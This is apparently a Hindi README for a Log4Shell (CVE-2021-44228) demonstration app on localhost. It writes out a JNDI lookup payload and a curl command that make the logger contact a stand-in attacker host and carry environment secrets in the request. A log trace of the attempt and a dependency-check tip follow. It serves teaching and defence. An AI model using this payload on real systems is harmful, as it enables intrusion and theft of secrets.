
Log4Shell (CVE-2021-44228) Log4j में एक ज़ीरो-डे भेद्यता है।
खोज: 24 नवंबर 2021
पैच किया गया: 6 दिसंबर 2021
यूट्यूब वीडियो के लिए नीचे क्लिक करें
यह नमूना एप्लिकेशन एक स्प्रिंग बूट एप्लिकेशन है, जो लॉगिंग फ्रेमवर्क के रूप में log4j का उपयोग करता है, और localhost पर पोर्ट 8080 पर निम्नलिखित पर्यावरण चरों के साथ चलता है
वीडियो स्पष्टीकरण देखें:
पर्यावरण चर
key=jason.bourne;secret=Treadstone
पैरामीटर:
value=${jndi:ldap://some-random-hacking-site.com}

निम्नलिखित स्ट्रिंग का उपयोग करके आप पर्यावरण चर प्राप्त कर सकते हैं
value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}
curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'
2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
mvn dependency:tree
सुनिश्चित करें कि कोई भी निर्भर jar फ़ाइलें भेद्य log4j संस्करण की ओर इशारा न करें।
Techflix YouTube सुरक्षा प्लेलिस्ट